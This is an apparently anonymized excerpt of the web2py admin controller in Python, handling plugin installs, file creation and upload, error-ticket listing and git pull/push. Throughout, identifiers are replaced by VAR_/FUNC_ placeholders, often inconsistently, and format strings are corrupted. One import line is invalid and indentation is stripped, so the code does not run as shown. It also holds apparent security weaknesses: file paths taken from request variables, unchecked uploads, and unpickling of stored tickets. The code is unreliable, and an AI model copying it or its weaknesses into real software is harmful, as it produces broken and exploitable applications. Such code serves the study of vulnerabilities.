VAR_74 = read_plural_dict(
apath(VAR_5, VAR_122=request)) # plural VAR_148 dictionary
VAR_75 = int(request.vars.nplurals) - 1 # plural VAR_148 quantity
VAR_76 = xrange(VAR_75)
if '__corrupted__' in VAR_74:
VAR_26 = SPAN(VAR_74['__corrupted__'], VAR_144='error')
return dict(VAR_5=filename, VAR_26=form)
VAR_72 = sorted(VAR_74.keys(), lambda x, y: cmp(
unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
VAR_77 = []
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
VAR_148 = VAR_74[VAR_143]
if len(VAR_148) < VAR_75:
VAR_148.extend(None for VAR_111 in xrange(VAR_75 - len(VAR_148)))
VAR_149 = DIV(CAT(LABEL(T("Singular Form")), B(VAR_143,
VAR_144='fake-input')))
VAR_150 = [SPAN(LABEL(T("Plural Form #%s", VAR_173 + 1)), INPUT(_type='text', _name=VAR_10 + '_' + str(VAR_173), VAR_9=VAR_148[VAR_173], _size=20), VAR_144='span6') for VAR_173 in VAR_76]
VAR_151 = DIV(CAT(*VAR_150))
VAR_152 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % VAR_10, VAR_144='btn'), VAR_144='span6'))
VAR_153 = DIV(DIV(VAR_149, '\n', VAR_151, '\n', VAR_152, VAR_144='well well-small'), _id=VAR_10, VAR_144='row-fluid tab_row')
VAR_77.append(VAR_153)
VAR_77.append(DIV(TAG['button'](T('update'), _type='submit',
VAR_144='btn btn-primary'),
VAR_144='controls'))
VAR_78 = DIV(*VAR_77, **dict(VAR_144="row-fluid"))
VAR_26 = FORM(VAR_78)
if VAR_26.accepts(request.vars, keepvalues=True):
VAR_154 = dict()
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
if VAR_26.vars[VAR_10 + '_0'] == chr(127):
continue
VAR_154[VAR_143] = [VAR_26.vars[VAR_10 + '_' + str(VAR_173)]
for VAR_173 in VAR_76]
write_plural_dict(apath(VAR_5, VAR_122=request), VAR_154)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(VAR_122=request, VAR_98=request.args, VAR_17=dict(
VAR_75=request.vars.nplurals)))
return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def VAR_79():
VAR_3 = FUNC_5()
VAR_79 = FUNC_3(apath('%VAR_140/ABOUT' % VAR_3, VAR_122=request))
VAR_80 = FUNC_3(apath('%VAR_140/LICENSE' % VAR_3, VAR_122=request))
return dict(VAR_3=VAR_3, VAR_79=MARKMIN(VAR_79), VAR_80=MARKMIN(VAR_80), VAR_6=FUNC_11(VAR_3))
def FUNC_34():
VAR_3 = FUNC_5()
if not VAR_43.flash and VAR_3 == request.application:
VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
VAR_43.flash = VAR_155
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
VAR_5 = os.path.basename(request.vars.pluginfile.filename)
if plugin_install(VAR_3, request.vars.pluginfile.file,
request, VAR_5):
session.flash = T('new VAR_96 installed')
redirect(URL('design', VAR_98=VAR_3))
else:
session.flash = \
T('unable to install VAR_96 "%s"', VAR_5)
redirect(URL(VAR_122=request, VAR_98=VAR_3))
elif isinstance(request.vars.pluginfile, str):
session.flash = T('plugin not specified')
redirect(URL(VAR_122=request, VAR_98=VAR_3))
if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_81 = [x.replace('\\', '/') for x in VAR_81]
VAR_82 = {}
for VAR_156 in VAR_81:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
VAR_82[VAR_156].sort()
controllers = sorted(
listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
VAR_51 = [x.replace('\\', '/') for x in VAR_51]
VAR_83 = {}
for VAR_48 in VAR_51:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
try:
VAR_95 = find_exposed_functions(VAR_2)
VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
except SyntaxError as err:
VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
VAR_84 = sorted(
listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+(\.\w+)+$'))
VAR_84 = [x.replace('\\', '/') for x in VAR_84 if not x.endswith('.bak')]
VAR_85 = {}
VAR_86 = {}
for VAR_48 in VAR_84:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
if VAR_95:
VAR_85[VAR_48] = VAR_95[0][1]
VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
modules.sort()
VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
VAR_88 = [x.replace('\\', '/') for x in VAR_88]
privates.sort()
VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
maxnum=VAR_1)
VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
statics.sort()
VAR_90 = os.path.join(apath(VAR_3, VAR_122=request), 'languages')
VAR_91 = dict([(VAR_188, info) for VAR_188, info
in iteritems(read_possible_languages(VAR_90))
if info[2] != 0]) # info[2] is langfile_mtime:
VAR_92 = apath('%VAR_140/cron' % VAR_3, VAR_122=request)
VAR_93 = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
if not is_gae:
if not os.path.exists(VAR_92):
os.mkdir(VAR_92)
if not os.path.exists(VAR_93):
FUNC_4(VAR_93, '#crontab')
VAR_94 = []
def FUNC_62(VAR_95, VAR_94):
FUNC_56 += [VAR_70[7:].split('/')[0].split(
'.')[0] for VAR_70 in VAR_95 if VAR_70.startswith('plugin_')]
VAR_94[:] = list(set(VAR_94))
FUNC_56.sort()
return [VAR_70 for VAR_70 in VAR_95 if not VAR_70.startswith('plugin_')]
return dict(VAR_3=app,
VAR_81=FUNC_62(VAR_81, VAR_94),
VAR_82=defines,
VAR_51=FUNC_62(VAR_51, VAR_94),
VAR_83=functions,
VAR_84=FUNC_62(VAR_84, VAR_94),
VAR_87=FUNC_62(VAR_87, VAR_94),
VAR_85=extend,
VAR_86=include,
VAR_88=FUNC_62(VAR_88, VAR_94),
VAR_89=FUNC_62(VAR_89, VAR_94),
VAR_91=languages,
VAR_93=crontab,
VAR_94=FUNC_56)
def FUNC_35():
VAR_3 = request.args(0)
VAR_96 = request.args(1)
VAR_97 = 'plugin_' + VAR_96
VAR_46 = FORM.confirm(
T('Delete'),
{T('Cancel'): URL('design', VAR_98=VAR_3)})
if VAR_46.accepted:
try:
for VAR_168 in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), VAR_168)
for VAR_70 in os.listdir(VAR_15):
if VAR_70.rsplit('.', 1)[0] == VAR_97:
VAR_5 = os.path.join(VAR_15, VAR_70)
if os.path.isdir(VAR_5):
shutil.rmtree(VAR_5)
else:
os.unlink(VAR_5)
session.flash = T('plugin "%(VAR_96)s" deleted',
dict(VAR_96=FUNC_36))
except Exception:
session.flash = T('unable to FUNC_21 VAR_16 VAR_96 "%(VAR_96)s"',
dict(VAR_96=FUNC_36))
redirect(URL('design', VAR_98=request.args(0), VAR_157=request.vars.id2))
return dict(VAR_46=dialog, VAR_96=FUNC_36)
def VAR_96():
VAR_3 = FUNC_5()
VAR_96 = request.args(1)
if not VAR_43.flash and VAR_3 == request.application:
VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
VAR_43.flash = VAR_155
if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_81 = [x.replace('\\', '/') for x in VAR_81]
VAR_82 = {}
for VAR_156 in VAR_81:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
VAR_82[VAR_156].sort()
controllers = sorted(
listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
VAR_51 = [x.replace('\\', '/') for x in VAR_51]
VAR_83 = {}
for VAR_48 in VAR_51:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
try:
VAR_95 = find_exposed_functions(VAR_2)
VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
except SyntaxError as err:
VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
VAR_84 = sorted(
listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+\.\w+$'))
VAR_84 = [x.replace('\\', '/') for x in VAR_84]
VAR_85 = {}
VAR_86 = {}
for VAR_48 in VAR_84:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
if VAR_95:
VAR_85[VAR_48] = VAR_95[0][1]
VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
modules.sort()
VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
VAR_88 = [x.replace('\\', '/') for x in VAR_88]
privates.sort()
VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
maxnum=VAR_1)
VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
statics.sort()
VAR_91 = sorted([VAR_188 + '.py' for VAR_188, info in
iteritems(T.get_possible_languages_info())
if info[2] != 0]) # info[2] is langfile_mtime:
crontab = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
if not os.path.exists(VAR_93):
FUNC_4(VAR_93, '#crontab')
def FUNC_62(VAR_95):
VAR_32 = re.compile('^plugin_' + VAR_96 + '(/.*|\..*)?$')
return [VAR_70 for VAR_70 in VAR_95 if VAR_70 and VAR_32.match(VAR_70)]
return dict(VAR_3=app,
VAR_81=FUNC_62(VAR_81),
VAR_82=defines,
VAR_51=FUNC_62(VAR_51),
VAR_83=functions,
VAR_84=FUNC_62(VAR_84),
VAR_87=FUNC_62(VAR_87),
VAR_85=extend,
VAR_86=include,
VAR_88=FUNC_62(VAR_88),
VAR_89=FUNC_62(VAR_89),
VAR_91=languages,
VAR_93=crontab)
def FUNC_37():
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
VAR_157 = '#' + request.vars.id if request.vars.id else ''
if request.vars.app:
VAR_3 = FUNC_5(request.vars.app)
VAR_15 = abspath(request.vars.location)
else:
if request.vars.dir:
request.vars.location += request.vars.dir + '/'
VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
VAR_15 = apath(request.vars.location, VAR_122=request)
VAR_5 = re.sub('[^\w./-]+', '_', request.vars.filename)
if VAR_15[-7:] == '/rules/':
if len(VAR_5) == 0:
raise SyntaxError
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_188 = re.match('^plural_rules-(.*)\.py$', VAR_5).group(1)
VAR_189 = read_possible_languages(apath(VAR_3, VAR_122=request))[VAR_188]
VAR_112 = dedent("""
VAR_75=2 # for example, English language has 2 VAR_148:
get_plural_id = lambda VAR_173: int(VAR_173 != 1)
construct_plural_form = lambda word, plural_id: word
""")[1:] % dict(VAR_188=VAR_189[0], langname=VAR_189[1])
elif VAR_15[-11:] == '/VAR_91/':
if len(VAR_5) == 0:
raise SyntaxError
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), 'languages', VAR_5)
if not os.path.exists(VAR_15):
FUNC_4(VAR_15, '')
findT(apath(VAR_3, VAR_122=request), VAR_5[:-3])
session.flash = T('language VAR_16 "%(VAR_5)s" VAR_175/updated',
dict(VAR_5=filename))
redirect(request.vars.sender + VAR_157)
elif VAR_15[-8:] == '/VAR_81/':
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = '# -*- coding: utf-8 -*-\n'
elif VAR_15[-13:] == '/VAR_51/':
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = '# -*- coding: utf-8 -*-\VAR_173# %VAR_140\ndef VAR_197(): return dict(message="hello from %s")'
VAR_112 = text % (T('try something like'), VAR_5)
elif VAR_15[-7:] == '/VAR_84/':
if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
if VAR_5.find('.') < 0:
VAR_5 += '.html'
VAR_50 = VAR_5.split('.')[-1].lower()
if len(VAR_5) == 5:
raise SyntaxError
VAR_155 = T(
'This is the %(VAR_5)VAR_140 template', dict(VAR_5=filename))
if VAR_50 == 'html':
VAR_112 = dedent("""
{{VAR_85 'layout.html'}}
<h1>%VAR_140</h1>
{{=BEAUTIFY(VAR_43._vars)}}""" % VAR_155)[1:]
else:
VAR_222 = os.path.join(VAR_15, 'generic.' + VAR_50)
if os.path.exists(VAR_222):
VAR_112 = read_file(VAR_222)
else:
VAR_112 = ''
elif VAR_15[-9:] == '/VAR_87/':
if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
if not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if len(VAR_5) == 3:
raise SyntaxError
VAR_112 = dedent("""
from gluon import *\n""")[1:]
elif (VAR_15[-8:] == '/static/') or (VAR_15[-9:] == '/private/'):
if (request.vars.plugin and
not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin)):
VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
VAR_112 = ''
else:
redirect(request.vars.sender + VAR_157)
VAR_158 = os.path.join(VAR_15, VAR_5)
VAR_159 = os.path.dirname(VAR_158)
if not os.path.exists(VAR_159):
os.makedirs(VAR_159)
if os.path.exists(VAR_158):
raise SyntaxError
FUNC_4(VAR_158, VAR_112)
FUNC_1(VAR_3, 'CREATE', VAR_5)
if request.vars.dir:
VAR_110 = T('file "%(VAR_5)s" created',
dict(VAR_5=VAR_158[len(VAR_15):]))
else:
session.flash = T('file "%(VAR_5)s" created',
dict(VAR_5=VAR_158[len(VAR_15):]))
VAR_17 = {}
if request.vars.id:
VAR_17['id'] = request.vars.id
if request.vars.app:
VAR_17['app'] = request.vars.app
redirect(URL('edit',
VAR_98=[os.path.join(request.vars.location, VAR_5)], VAR_17=vars))
except Exception as VAR_114:
if not isinstance(VAR_114, HTTP):
session.flash = T('cannot create file')
if request.vars.dir:
VAR_43.flash = VAR_110
VAR_43.headers['web2py-VAR_126-content'] = 'append'
VAR_43.headers['web2py-VAR_126-command'] = "%VAR_140 %VAR_140 %s" % (
"$.web2py.invalidate('#files_menu');",
"load_file('%s');" % URL('edit', VAR_98=[VAR_3, request.vars.dir, VAR_5]),
"$.web2py.enableElement($('#VAR_26 form').find($.web2py.formInputClickSelector));")
return ''
else:
redirect(request.vars.sender + VAR_157)
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
VAR_45 = sorted(
listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
VAR_45 = [x.replace('\\', '/') for x in VAR_45 if not x.endswith('.bak')]
return VAR_45
def FUNC_39(VAR_15, VAR_16, VAR_17={}, VAR_3=None):
VAR_98 = (VAR_15, VAR_16) if 'app' in VAR_17 else (VAR_3, VAR_15, VAR_16)
VAR_99 = URL('edit', VAR_98=args, VAR_17=vars)
return A(VAR_16, VAR_144='editor_filelink', _href=VAR_99, _style='word-wrap: nowrap;')
def FUNC_40():
VAR_3 = request.vars.app or 'welcome'
VAR_65 = [{'name': 'models', 'reg': '.*\.py$'},
{'name': 'controllers', 'reg': '.*\.py$'},
{'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
{'name': 'modules', 'reg': '.*\.py$'},
{'name': 'static', 'reg': '[^\.#].*'},
{'name': 'private', 'reg': '.*\.py$'}]
VAR_100 = []
for VAR_13 in VAR_65:
VAR_100.append(TAG[''](LI(VAR_13['name'], VAR_144="nav-header component", _onclick="collapse('" + VAR_13['name'] + "_files');"),
LI(UL(*[LI(FUNC_39(VAR_13['name'], VAR_221, dict(id=VAR_13['name'] + VAR_221.replace('.', '__')), VAR_3), _style="overflow:hidden", _id=VAR_13['name'] + "__" + VAR_221.replace('.', '__'))
for VAR_221 in FUNC_38(VAR_3, VAR_13['name'], VAR_14=VAR_13['reg'])],
VAR_144="nav nav-list small-font"),
_id=VAR_13['name'] + '_files', _style="display: none;")))
return dict(VAR_100=result_files)
def FUNC_41():
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
VAR_5 = None
VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
VAR_15 = apath(request.vars.location, VAR_122=request)
if request.vars.filename:
VAR_5 = re.sub('[^\w\./]+', '_', request.vars.filename)
else:
VAR_5 = os.path.split(request.vars.file.filename)[-1]
if VAR_15[-8:] == '/VAR_81/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-9:] == '/VAR_87/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-13:] == '/VAR_51/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
if VAR_15[-7:] == '/VAR_84/' and not VAR_5[-5:] == '.html':
VAR_5 += '.html'
if VAR_15[-11:] == '/VAR_91/' and not VAR_5[-3:] == '.py':
VAR_5 += '.py'
VAR_5 = os.path.join(VAR_15, VAR_5)
VAR_159 = os.path.dirname(VAR_5)
if not os.path.exists(VAR_159):
os.makedirs(VAR_159)
VAR_2 = request.vars.file.file.read()
VAR_160 = FUNC_0(VAR_2)
FUNC_4(VAR_5, VAR_2, 'wb')
FUNC_1(VAR_3, 'UPLOAD', VAR_5, VAR_160)
session.flash = T('file "%(VAR_5)s" uploaded',
dict(VAR_5=filename[len(VAR_15):]))
except Exception:
if VAR_5:
VAR_68 = dict(VAR_5=filename[len(VAR_15):])
else:
VAR_68 = dict(VAR_5='unknown')
session.flash = T('cannot upload VAR_16 "%(VAR_5)s"', VAR_68)
redirect(request.vars.sender)
def FUNC_42():
import operator
import os
import .hashlib
VAR_3 = FUNC_5()
if is_gae:
VAR_161 = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
VAR_161 = request.args(1) or 'new'
VAR_101 = {}
db_ready['status'] = FUNC_43(VAR_3)
VAR_101['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
VAR_101['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if VAR_161 == 'new':
VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
VAR_163 = []
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_163.append(VAR_70[7:])
VAR_164 = dict()
for fn in listdir(VAR_162, '^[VAR_7-fA-F0-9.\-]+$'):
VAR_190 = os.path.join(VAR_162, fn)
if not os.path.isfile(VAR_190):
continue
try:
VAR_205 = FUNC_2(VAR_190, 'rb')
try:
VAR_125 = pickle.load(VAR_205)
finally:
VAR_205.close()
except IOError:
continue
except EOFError:
continue
VAR_191 = hashlib.md5(to_bytes(VAR_125['traceback'])).hexdigest()
if VAR_191 in VAR_163:
os.unlink(VAR_190)
else:
try:
VAR_164[VAR_191]['count'] += 1
except KeyError:
VAR_218 = VAR_125['traceback'].split("\n")
VAR_219 = VAR_218[-2] if len(VAR_218) > 1 else 'unknown'
VAR_220 = os.path.split(VAR_125['layer'])[1]
VAR_164[VAR_191] = dict(count=1, pickel=VAR_125,
causer=VAR_220,
VAR_219=last_line,
VAR_191=hash, VAR_113=fn)
VAR_165 = [(x['count'], x) for x in VAR_164.values()]
VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=VAR_3, VAR_161=method, VAR_101=db_ready)
elif VAR_161 == 'dbnew':
VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
VAR_192, VAR_193 = FUNC_43(VAR_3)
VAR_163 = []
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_163.append(VAR_70[7:])
VAR_164 = dict()
for fn in VAR_192(VAR_193.id > 0).select():
try:
VAR_125 = pickle.loads(fn.ticket_data)
VAR_191 = hashlib.md5(VAR_125['traceback']).hexdigest()
if VAR_191 in VAR_163:
VAR_192(VAR_193.id == fn.id).delete()
VAR_192.commit()
else:
try:
VAR_164[VAR_191]['count'] += 1
except KeyError:
VAR_218 = VAR_125['traceback'].split("\n")
VAR_219 = VAR_218[-2]
VAR_220 = os.path.split(VAR_125['layer'])[1]
VAR_164[VAR_191] = dict(count=1,
pickel=VAR_125, causer=VAR_220,
VAR_219=last_line, VAR_191=hash,
VAR_113=fn.ticket_id)
except AttributeError as VAR_114:
VAR_192(VAR_193.id == fn.id).delete()
VAR_192.commit()
VAR_165 = [(x['count'], x) for x in VAR_164.values()]
VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=app,
VAR_161=method, VAR_101=db_ready)
elif VAR_161 == 'dbold':
VAR_192, VAR_193 = FUNC_43(VAR_3)
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_':
VAR_192(VAR_193.ticket_id == VAR_70[7:]).delete()
VAR_192.commit()
VAR_206 = VAR_192(VAR_193.id > 0).select(VAR_193.ticket_id,
VAR_193.created_datetime,
orderby=~VAR_193.created_datetime)
VAR_207 = [row.ticket_id for row in VAR_206]
VAR_208 = dict([(row.ticket_id, row.created_datetime) for
row in VAR_206])
return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method,
VAR_208=times, VAR_101=db_ready)
else:
for VAR_70 in request.vars:
if VAR_70[:7] == 'delete_' and (not VAR_70 == "delete_all}"):
os.unlink(apath('%VAR_140/FUNC_42/%s' % (VAR_3, VAR_70[7:]), VAR_122=request))
VAR_209 = lambda p: os.stat(apath('%VAR_140/FUNC_42/%s' %
(VAR_3, p), VAR_122=request)).st_mtime
VAR_207 = sorted(
listdir(apath('%VAR_140/FUNC_42/' % VAR_3, VAR_122=request), '^\w.*'),
VAR_143=VAR_209,
reverse=True)
return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method, VAR_101=db_ready)
def FUNC_43(VAR_3):
VAR_102 = apath('%VAR_140/private' % VAR_3, VAR_122=request)
VAR_103 = os.path.join(VAR_102, 'ticket_storage.txt')
if os.path.exists(VAR_103):
VAR_166 = FUNC_3(VAR_103)
VAR_166 = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
VAR_166 = "google:datastore"
else:
return False
VAR_104 = 'web2py_ticket'
VAR_105 = VAR_104 + '_' + VAR_3
VAR_106 = apath('%VAR_140/databases' % VAR_3, VAR_122=request)
VAR_107 = DAL(VAR_166, VAR_168=VAR_106, auto_import=True)
if not VAR_107.get(VAR_105):
VAR_167 = VAR_107.define_table(
VAR_105,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return VAR_107, VAR_107.get(VAR_105)
def FUNC_44(VAR_15):
VAR_108 = VAR_15.replace('\\', '/')
if os.path.isabs(VAR_108) and os.path.isfile(VAR_108):
(VAR_168, VAR_5) = os.path.split(VAR_108)
(VAR_11, VAR_169) = os.path.splitext(VAR_5)
VAR_3 = FUNC_5()
VAR_170 = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for VAR_143 in VAR_170.keys():
VAR_194 = VAR_168.endswith("%VAR_140/%s" % (VAR_3, VAR_143))
if VAR_169.lower() == VAR_170[VAR_143] and VAR_194:
return to_native(A('"' + VAR_108 + '"',
_href=URL(VAR_122=request,
VAR_221='edit/%VAR_140/%VAR_140/%s' % (VAR_3, VAR_143, VAR_5))).xml())
return ''
def FUNC_45(VAR_18):
VAR_109 = VAR_18.split('"')
VAR_110 = (len(VAR_109) != 0) and VAR_109[0] or ''
VAR_111 = 1
while VAR_111 < len(VAR_109):
VAR_171 = FUNC_44(VAR_109[VAR_111])
if VAR_171 == '':
VAR_110 += '"' + VAR_109[VAR_111]
else:
VAR_110 += VAR_171
if VAR_111 + 1 < len(VAR_109):
VAR_110 += VAR_109[VAR_111 + 1]
VAR_111 = VAR_111 + 1
VAR_111 = VAR_111 + 1
return VAR_110
class CLASS_0(object):
def __init__(self, VAR_112):
self.s = FUNC_45(CODE(VAR_112).xml())
def FUNC_63(self):
return self.s
def VAR_113():
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
VAR_3 = FUNC_5()
VAR_27 = request.env.web2py_version
VAR_113 = request.args[1]
VAR_114 = RestrictedError()
VAR_114.load(request, VAR_3, VAR_113)
return dict(VAR_3=app,
VAR_113=FUNC_46,
VAR_67=VAR_114.output,
VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
snapshot=VAR_114.snapshot,
VAR_180=VAR_114.code,
layer=VAR_114.layer,
VAR_27=myversion)
def FUNC_47():
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
VAR_3 = FUNC_5()
VAR_27 = request.env.web2py_version
VAR_113 = request.args[1]
VAR_114 = RestrictedError()
request.tickets_db = FUNC_43(VAR_3)[0]
VAR_114.load(request, VAR_3, VAR_113)
VAR_43.view = 'default/VAR_113.html'
return dict(VAR_3=app,
VAR_113=FUNC_46,
VAR_67=VAR_114.output,
VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
snapshot=VAR_114.snapshot,
VAR_180=VAR_114.code,
layer=VAR_114.layer,
VAR_27=myversion)
def VAR_125():
raise RuntimeError('admin VAR_113 generator at your service')
def FUNC_49():
VAR_3 = FUNC_5()
update_all_languages(apath(VAR_3, VAR_122=request))
session.flash = T('Language VAR_45 (static VAR_71) updated')
redirect(URL('design', VAR_98=VAR_3, VAR_157='languages'))
def FUNC_50():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(VAR_26=auth())
else:
return dict(VAR_26=T("Disabled"))
def FUNC_51():
gluon.rewrite.load()
redirect(URL('site'))
def FUNC_52():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
VAR_115 = SQLFORM.grid(db.auth_user)
return locals()
def FUNC_53():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('emails', 'text'))
if VAR_26.process().accepted:
VAR_172 = [x.strip() for x in VAR_26.vars.emails.split('\n') if x.strip()]
VAR_173 = 0
for email in VAR_172:
if not db.auth_user(email=email):
VAR_173 += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%VAR_140 students registered', VAR_173)
redirect(URL('site'))
return locals()
def FUNC_54():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_46 = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if VAR_46.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_196 = VAR_195.remotes.origin
VAR_196.fetch()
VAR_196.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain VAR_45 could not be checked VAR_39. Check logs for VAR_178.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for VAR_178.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_55():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
VAR_26.element('input[type=submit]')['_value'] = T('Push')
VAR_26.add_button(T('Cancel'), URL('site'))
VAR_26.process()
if VAR_26.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_197 = VAR_195.index
